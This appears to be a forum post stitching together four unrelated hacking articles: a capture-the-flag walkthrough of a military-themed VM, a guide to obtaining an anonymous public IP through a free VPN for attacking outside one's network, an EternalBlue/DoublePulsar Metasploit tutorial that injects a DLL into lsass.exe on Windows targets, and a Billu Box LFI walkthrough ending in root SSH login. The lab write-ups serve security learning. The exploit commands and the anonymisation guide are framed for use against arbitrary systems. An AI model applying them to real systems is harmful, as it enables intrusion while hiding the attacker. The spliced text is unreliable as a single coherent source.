05-02-2020, 11:45 AM
| 0 | 0 | ||
[To see content please register here]
Are you ready for the challenge soldier? The first step to attack is to identify the target. So, identify your target. To identify the target we will use the following command:
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-GiWjeFofhDs/WQnvFVsVv3I/AAAAAAAAP7w/a_QGoZekuiEiGTruHW8c8B4VlOIAPaD2gCLcB/s1600/1.png?w=687&ssl=1)
Now that you have identified your target (mine is 192.168.1.17) you will need to acquire it and declare your victory. In order to acquire it we will need a plan to enter our enemy. To let us search for all the doors, closed or not. And for that let’s fire up the nmap.
nmap -p- -A 192.168.1.17
1
nmap -p- -A 192.168.1.17
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-2lYQ6gU1plg/WQnvIR5qnDI/AAAAAAAAP8g/OBEBBNTnSKstw-lF41xcrWfAj5bpnRmuQCEw/s1600/2.png?w=687&ssl=1)
Our search has led us to the result that Port nos. 21, 80,443, 2225 is open with the services of FTP, HTTP, HTTPS, SSH respectively. As the port 80 is open we can open our target IP in the browser.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-L0w3Obxwue4/WQnvJqeWU6I/AAAAAAAAP88/zRdNnMK_yDcg-GqRkzsy9VfjBOrKrSazgCEw/s1600/3.png?w=687&ssl=1)
But there is no hint or what-so-ever in there. But as this based on military aspects the hint could be camouflaged. Therefore let’s check the source code.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-nh71dJIow6Y/WQnvJ2RoIaI/AAAAAAAAP9A/yA_MJnP4K18RkMOQCjGBzDpm2gQdRBZ2ACEw/s1600/4.png?w=687&ssl=1)
And yes!! We have found the flag 0 although it is coded base64. Upon decoding it will become netdiscover.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-GuKQ5FFeyN4/WQnvJzrO0jI/AAAAAAAAP9E/k-GM_a4uZ24HWOttNNRLdpC-vHX73va9ACEw/s1600/5.png?w=687&ssl=1)
As the source is unknown territory, I inspected more and found that there was a directory which proved to be very useful: assests/lafiya.js
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/--m_2QIuhKc8/WQnvKDYXcGI/AAAAAAAAP9I/w-o0GdiCH2obQEPEO3vhuqjO05Z_AEk0QCEw/s1600/6.png?w=687&ssl=1)
Open the said directory in the browser and check its source code. In the source code, you will find flag 1 which will be in hex.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-1c25K4XYlKU/WQnvKrGtihI/AAAAAAAAP9Y/lgNPe1p5MvUzOuRGFaBFdTvvpxNPoSetwCEw/s1600/7.png?w=687&ssl=1)
Upon converting hex you will uncover flag 2 in an MD5 form.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-ZZz3TpAWl4A/WQnvKlXZpjI/AAAAAAAAP9Y/LTRHQ4c-IDMEOZJHPr7-tCKEGOLX1zjlwCEw/s1600/8.png?w=687&ssl=1)
When you convert MD5 value to its original, it will be nmap as shown in the image below.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-7Kos-EoILHE/WQnvK3nNBDI/AAAAAAAAP9Y/n4JnZkhT7RcyXgGYPNhTxYzZVNu0Ia-hACEw/s1600/9.png?w=687&ssl=1)
The second flag was nmap that means there is something the nmap that we missed. And upon reviewing it I remembered that SSH service was open on the port 2225. And so I accessed it with the following command.
ssh 192.168.1.17 -p 2225
1
ssh 192.168.1.17 -p 2225
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-_yXMag8bHTc/WQnvFHhtblI/AAAAAAAAP9Y/t7r8_CznumkjEg7MeiS-Sn2zkvILBJFPACEw/s1600/10.png?w=687&ssl=1)
And there we have it our flag 2B in an MD5 value. Let’s convert it.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-YvvAHhUY0ME/WQnvFd8G0BI/AAAAAAAAP9Y/swxT0FFbnBUHmeQXrP99g5vuwrUciiwaACEw/s1600/11.png?w=687&ssl=1)
Our flag 2B is encrypted. That means there is something related to encryption and security. Now the best way to provide security to a website is through its security certificate. Let’s check it out.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-jDwv1xCZTz8/WQnvF9OHcjI/AAAAAAAAP9Y/rBlwcKBhDzwZzl5SLe6DlC85sBbWC-mUgCEw/s1600/12.png?w=687&ssl=1)
Now, upon examining the certificate, you will find your third flag and a hint i.e [39 39 30].
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-csqW9RDPEkQ/WQnvGHZQCSI/AAAAAAAAP9Y/1TG0pIYtPxEzhKz7od2rIEq2NGK80WVxQCEw/s1600/13.png?w=687&ssl=1)
Firstly, decode the flag which will be unit. Now if you decode it anywhere you will not get a result. And I did searched and searched again but couldn’t get it to decode. So I visited the author’s walkthrough and there it says that it is translated the unit. And therefore I used the unit in my walkthrough.
![[Image: 14.1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-71SAUb8_Wmg/WQnvF-YwPnI/AAAAAAAAP9Y/pTtjDu0hcGwdZqN6Qodh3H-FwdPRyhMLgCEw/s1600/14.1.png?w=687&ssl=1)
The combination of 3, 9, 0 will be the suffix of the word unit. But there is a lot of combination for it so let’s create those combinations with the help of crunch with the command:
crunch 3 3 390
1
crunch 3 3 390
![[Image: 14.2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ea7JuD7pllI/WQnvGOTZBWI/AAAAAAAAP9Y/-w0c152V3GIk5pQKk6v9TC3sSj4bom_BwCEw/s1600/14.2.png?w=687&ssl=1)
We will get 27 possible combinations and so make a text file for dictionary attack and add the word ‘unit’ as a prefix to every combination. Now let’s use dirb to find anything related to unit and these combinations.
dirb
[To see content please register here]
/root/Desktop/dict.txt1
dirb
[To see content please register here]
/root/Desktop/dict.txt![[Image: 14.3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-HMpKEDzYj9s/WQnvGWtn7qI/AAAAAAAAP9Y/uRGyZtL31vU1gQTgQoW_h2qGX9hUmQJowCEw/s1600/14.3.png?w=687&ssl=1)
To our joy there is a directory that goes by unit990. Let’s open it in our browser without further delay.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-YX6aQnBcDC0/WQnvGydPjSI/AAAAAAAAP9Y/2kvamGuzNPQMGs545Hh5PriXQP_3-sE8ACEw/s1600/14.png?w=687&ssl=1)
We do not have credentials for logging in. So, I checked it source code instead. In the source code, you will find flag 4 in a base64 code.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-O5sFofubC_g/WQnvGznmJrI/AAAAAAAAP9Y/Zk3xSG67ZzkQYFhbiX8vj0ksZRWU2csxgCEw/s1600/15.png?w=687&ssl=1)
Decode the flag and you will get admin.php
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-QxwqQeQpa5g/WQnvG6W9X_I/AAAAAAAAP9Y/CMUdMhx1Y_YBow-GlvBOWLGo3chzPyDpACEw/s1600/16.png?w=687&ssl=1)
After finding the flag, I opened the directory in the browser.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-qxHXmVGRsD4/WQnvHlXn3FI/AAAAAAAAP9Y/MR3FTGi3H_0q0z6sMYkhDlGGlB0DiZzGQCEw/s1600/17.png?w=687&ssl=1)
Opening the previously found directory in the browser will show the same page but its source code is edited. As you will check it, you will find that flag 5 again in base64 code.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-8BlgVVUX4M0/WQnvHqwwG9I/AAAAAAAAP9Y/JC74aMKVB7gzmK7z4ioTqH8Bd9b04H1hQCEw/s1600/18.png?w=687&ssl=1)
By decoding flag 5 you will get SQL injection. That means the next step should be SQL injection.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-KyiBuRrvzkc/WQnvHkHxtdI/AAAAAAAAP9Y/xzrh71ImtD4C4LufIDh3oO_VrZ6oKBraACEw/s1600/19.png?w=687&ssl=1)
Now, this hint is just to throw us off our track. I used every SQL injection technique I could find but it didn’t help. So I used dirb on the target.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-FhtF7M69LIQ/WQnvITH9hoI/AAAAAAAAP9Y/JKn9VGaDK5oo9e9OBsIM7jnc35YFwISVwCEw/s1600/20.png?w=687&ssl=1)
I found a directory called assets. And opened it in the browser and found the 7th flag.
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-3UG3DJRJSHI/WQnvIdj8YiI/AAAAAAAAP9Y/XHzqHdMs6MYnBYBMv0ybu39PnH91ot-XQCEw/s1600/21.png?w=687&ssl=1)
Now try and decode it widgets.
![[Image: 22.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Q-2JqNA6ep0/WQn4T_ociPI/AAAAAAAAP9k/CGQNyhIId9UOsCKlxGLsXgFe12B7kIGOwCLcB/s1600/22.1.png?w=687&ssl=1)
Now you can try and decode it but it’s hopeless to decode it anywhere online. So examined the dirb result more and found another directory called phpmyadmin
![[Image: 22.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-MaCo8GoVLLI/WQnvI8dXv4I/AAAAAAAAP9Y/nUTnHs6IpRsNokSe4hBLHwBzSQZh46-PgCEw/s1600/22.png?w=687&ssl=1)
If you open this directory in the browser you will find a login page. I used the top 10 most commonly used password and username i.e root and root and got in. In the database, I found a silex table. Now silex is the team’s name so I guess this is the most important table.
![[Image: 23.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-0xBLz-aRaz0/WQnvJEAypvI/AAAAAAAAP9Y/yAak41qBORc-kI6OhMJPIUI7JiiuxqAGQCEw/s1600/23.png?w=687&ssl=1)
Upon checking it, I found the admin and in admin, there was our 6th flag coded in base64
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-hdEfVnCliQg/WQnvJFiPtLI/AAAAAAAAP9Y/reEwjfCIrvM8GMWSHHYQjRUqzryHjkWkACEw/s1600/24.png?w=687&ssl=1)
Upon decoding, it says Nigiarforcecloud.
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-MAl-n1nzTh8/WQnvJch-9LI/AAAAAAAAP9Y/ZZu30gjlLqIlC5JrNd_cXYvFTTIcNqvFwCEw/s1600/25.png?w=687&ssl=1)
And voila!! All our flags are uncovered. Good work soldiers. Solving this VM was good exercise and I salute the fallen Nigerian soldiers and wish them peace and praise the whole army.
Today through this article you will learn how an attacker can use anonymous VPN service to occupy public IP which will surely expand the area of your target list and you will be able to attack outside your network also.
Let’s Start!
In your, Kali Linux Open the terminal and type following command to start PPTP service for VPN configuration.
apt-get install network-manager-pptp
1
apt-get install network-manager-pptp
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-KFfyWW4wrWg/WQd0x5l-QpI/AAAAAAAAP6s/ce48DVXJcp0DL_VPj_h9H30em7QnDUI5ACLcB/s1600/1.png?w=687&ssl=1)
apt-get install network-manager-pptp-gnome
1
apt-get install network-manager-pptp-gnome
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-cC0we6-d2L4/WQd0y3Bx79I/AAAAAAAAP68/RwHRqHWnaVoXp34hqzR3vJEmNehqONywACEw/s1600/2.png?w=687&ssl=1)
Ipjetable.net is the web site which provides free VPN service to their registered users but this site will open through a proxy server so therefore I took help of free-proxy.xyz to open ipjettable.net web page.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-opwPmdPzfm8/WQd0zK2FO6I/AAAAAAAAP7A/cl37VFMm0KMwh7YZsRXJ-iEh1LB-ENN2gCEw/s1600/3.png?w=687&ssl=1)
Here you need to unlock the website so that you can use open VPN service anonymously. Click on I subscribe tab. Here I had Google translator.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-83rkVrF9xTI/WQd0zSfNGLI/AAAAAAAAP7E/08q_uRktexIyTbf4ziUXhDnPVOfO1x-JACEw/s1600/4.png?w=687&ssl=1)
Then it requires registration for unlocking VPN service now gives your email id for registration. I had to use a temporary email id for registration.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-iBt9jk2lmoM/WQd0zZYT-dI/AAAAAAAAP7I/QGM4YNRl1bU5Us670x7IoE9GcIJxgyTbgCEw/s1600/5.png?w=687&ssl=1)
When you will register into web site it will send you a mail in your inbox which contains username and password that we will use for VPN login. In the given screenshot you can observe we have highlighted the link, copy this link.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-u5lFuFwZ2Os/WQd0z3GN4-I/AAAAAAAAP7M/nvprFHiMUZMott7vxW26UWUyWCsizb3AQCEw/s1600/6.png?w=687&ssl=1)
Now paste above copied link inside free-proxy.xyz as done above for unlocking login page for VPN service. When you will unlock it, the given below web page will get open inside browser which will ask for login credential now give username and password which have received through the mail.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-1EE6vFVXToU/WQd0z5Fhy4I/AAAAAAAAP7Q/3gQJIr2PdNUXC_rNrCigoMmZNdszvnlqwCEw/s1600/7.png?w=687&ssl=1)
Now click on install ipjetable which start VPN service installation for your local network.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-CM3fWmaKp44/WQd00ROfBLI/AAAAAAAAP7U/hFlgAbxCIZwSn6SuwFu-cIto8T-WW9NowCEw/s1600/8.png?w=687&ssl=1)
Inside your, Kali Linux click on power icon available on right side corner of the screen to configuration VPN then select wired connected.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-kdXsAqViz9A/WQd00qYXyyI/AAAAAAAAP7Y/Mvd58HcN2iIJhtnQRRjrNv61k_Vw7NtCACEw/s1600/9.png?w=687&ssl=1)
Now click on (+) “plus” to add a new network connection.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ImNu_mgZByo/WQd0xi221mI/AAAAAAAAP6k/s-WbdU1jHJc-7mWGSb0ZHtCY5FNV3mG3gCEw/s1600/10.png?w=687&ssl=1)
Select point to point tunneling protocol
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Cna7P2zl9qk/WQd0xk9ycsI/AAAAAAAAP6o/i4pk_-zwWC4V8qEriIFxmXtZibWEQ4EWQCEw/s1600/11.png?w=687&ssl=1)
Now add username and password to connect which VPN server. Then click on advanced tab and select radio button store password only for this user.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-9xf5en0Kei8/WQd0yLViZ0I/AAAAAAAAP6w/Y9tFrvpTmUwU2lGCMq-IgvcunprF58JxwCEw/s1600/12.png?w=687&ssl=1)
From given screenshot select the checkbox for PPTP authentication and encryption then once all configurations is completed click on ok. Till here we have configured VPN service successfully in our Kali Linux.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-xxW7D9sPQTA/WQd0yui8e_I/AAAAAAAAP60/Ha4mgnP1YWsDVSxKM8D9_e6GitMmR1_WQCEw/s1600/13.png?w=687&ssl=1)
Let check our VPN IP that we have occupied
ifconfig
1
ifconfig
From the screenshot, you can read 192.168.0.102 is my local IP and 141.255.151.15 is our public IP now use this IP for your attack even outside of your network also.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-eb_juYVyPCU/WQd0yhBeEBI/AAAAAAAAP7c/2C2wL8rkOEgvh6fM2HLjn1GTbVvpfyRVACEw/s1600/14.png?w=687&ssl=1)
Through this article, we are sharing recent zero-day exploit which requires the Metasploit framework to shoot any other windows based system. This exploit is a combination of two tools “Eternal Blue” which is useful as a backdoor in windows and “Doublepulsar” which is used for injecting DLL file with the help of payload. So we will manually add this exploit in Metasploit framework and step up for attacking window server 2008.
Attacker: Kali Linux
Target: Windows 7 and Windows Server 2008
Let’s Start!
Open the terminal in Kali Linux and type the following command to download this exploit from git hub.
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-N7uRdI4cn5Q/WQYa0yXfMxI/AAAAAAAAP6Q/19xrQTggoRgNxJMKZwRD8Y_MFfSaVH--gCLcB/s1600/1.png?w=687&ssl=1)
Once the required exploit will get downloaded then open the folder and copy Eternal Blue- Doublepulsar .rb ruby file so that we can add this exploit inside Metasploit.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-8_SWYRndyy4/WQYa0lenYMI/AAAAAAAAP6I/Gr_YZ2nagcw7vNSFQS_GBl5nngTZwwmRQCEw/s1600/2.png?w=687&ssl=1)
Now past the copied ruby file inside given path Usr/share/metasploit Framework /module/exploits/windows/smb which will add this exploit inside Metasploit framework.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-raaOsYxiu4g/WQYa0tfa5PI/AAAAAAAAP6M/tf6ycj3wmEQ5ykCKKKzXd31ZwV6a2wdTQCEw/s1600/3.png?w=687&ssl=1)
Then load Metasploit framework to start and type following for testing zero-day exploit
msfconsole
1
msfconsole
This module exploits the vulnerability of SMBv1 and SMBv2 protocols through eternalblue. After that doublepulsar is used to inject remotely a malicious DLL.
use windows/smb/eternalblue_doublepulsar
msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64
msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe
msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6
msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104
msf exploit (eternalblue_doublepulsar)>exploit
1
2
3
4
5
6
7
8
use windows/smb/eternalblue_doublepulsar
msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64
msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe
msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6
msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104
msf exploit (eternalblue_doublepulsar)>exploit
Hence from the screenshot, you can observer only we need to set target’s architecture and IP before launching exploit and then when all information is set then launch your attack which will give you meterpreter session successfully as I have owned.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-adbJl89EMns/WQYa1OB-ZmI/AAAAAAAAP6U/5ubjDima6l0Bq0IY1pK-d9h5RbztyeyzQCEw/s1600/5.png?w=687&ssl=1)
Hi friends! Once again we are here with a new vulnerable lab challenge “Billu Box” .created by Manish Kishan Tanwar it mainly attacker need to escalate privileges to gain root access. You can download it from
[To see content please register here]
.Let’s breach!!!
Open the terminal in your Kali Linux scan your network using netdiscover command and hence from scanning result I got target IP 192.168.0.102
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-34Sn6UGPAG8/WQYL7NXswgI/AAAAAAAAP5M/agCVhzD2qvsFE7kgBF9y_pzCEwoHP5IUgCLcB/s1600/1.png?w=687&ssl=1)
Then use nmap aggressive scan for port and protocol enumeration:
nmap -p- -A 192.168.0.102
1
nmap -p- -A 192.168.0.102
So here I found port 22 and 80 are opened for SSH and HTTP respectively.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-td5x2qyN1Z8/WQYL7_-eb-I/AAAAAAAAP5Y/G50Vd3eqVn8vAjnMygfLKRKCpACtfOaNACLcB/s1600/2.png?w=687&ssl=1)
Since port 80 is open so I explore target IP on the browser but here I didn’t get any remarkable result.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-dVKCII40dyY/WQYL8bcROpI/AAAAAAAAP5c/HgU2Ui-xntI9PT_VpVngoGlTnCZ9l90iQCLcB/s1600/3.png?w=687&ssl=1)
Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories
Awesome! We have stepped up in the right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “test” directories. So now I will go with a test directory.
dirb
[To see content please register here]
/usr/share/wordlists/dirb/big.txt1
dirb
[To see content please register here]
/usr/share/wordlists/dirb/big.txt![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Kw2S2SZ0gZ0/WQYL8bWOomI/AAAAAAAAP5k/X_9qzNpkPHIFgu_OgdckVb3y4KbaWfgagCLcB/s1600/4.png?w=687&ssl=1)
So when I open the test.php file in the browser here I found a message “file parameter is empty please provide file path in file parameter” where file parameter is vulnerable to LFI.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-0j0ylf_3SAg/WQYL8R86pbI/AAAAAAAAP5g/Mu2KgfoHTsgyxxFL0CgRazWOJJ5dRwBHgCLcB/s1600/5.png?w=687&ssl=1)
Using a hackbar tool which is Firefox plug-in and Taking advantage of LFI vulnerability I try to include index.php in file parameter from file=index.php
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-laMVAP885xQ/WQYL80t_XcI/AAAAAAAAP5o/Xx0Gb0jvUdYkYQM228o9LQFzm0159r_pACLcB/s1600/6.png?w=687&ssl=1)
So when I open the index.php file here I found another file c.php is included.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/--_9Ds1-LBso/WQYL9DhRAxI/AAAAAAAAP5w/2HcHzrC6SDA6PgvHt-KpIL61v3IcLHqxACLcB/s1600/7.png?w=687&ssl=1)
So again with help of hackbar, I look for the c.php file from file=c.php for further enumeration so that we can find some clue to exploit the target.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-imYrm-wpBvw/WQYL9FPbcZI/AAAAAAAAP5s/rL7gp-gGoPc2kehIj7HpARcRIDXP0cMQQCLcB/s1600/8.png?w=687&ssl=1)
When I read c.php file here I got some information related to the connected database and the highlighted text is reflecting like credential for the database.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-G4g9IFQQSfo/WQYL9TyZlLI/AAAAAAAAP50/eGoNLhlgti0axJJV7p8lf8fuAAYRD--QQCLcB/s1600/9.png?w=687&ssl=1)
If you remembered the result of the dirb tool here it had revealed another directory which is phpmy so therefore I will go with phpmy for further enumeration.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-qTJh50MXYBc/WQYL7MgRQ2I/AAAAAAAAP5E/X7g1sqpx6UkkppibGGwzXEn8Ag_6W6v0gCLcB/s1600/10.png?w=687&ssl=1)
Then again taking advantage LFI I explore config.inc.php from file=/var/www/phpmy/config.inc.php
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-sXq4GK8aiSQ/WQYL7Fu0-WI/AAAAAAAAP5I/EWgL-U08CvA972w5wzU9oG0UT-Mt1mMDwCLcB/s1600/11.png?w=687&ssl=1)
Last but not least we have finally achieved something very remarkable and in the given screenshot you can read from the config.inc.php file I have found server’s login username and password root: toor respectively.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-TTWccwQdOgo/WQYL7uEiTNI/AAAAAAAAP5Q/NFUlnRDtFrg1hQJ0knQSIQNjWsQQChc5wCLcB/s1600/12.png?w=687&ssl=1)
From port enumeration result we have found port 22 is open for ssh, therefore, I will try root: toor for ssh login. When I use these credential for ssh login successfully I got root access hence the given challenge is completed.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-vX4ARQ_aorc/WQYL7irpcsI/AAAAAAAAP5U/XeKRVzzPU4cISexrxVJ6FdlkRmzpi2KogCLcB/s1600/13.png?w=687&ssl=1)
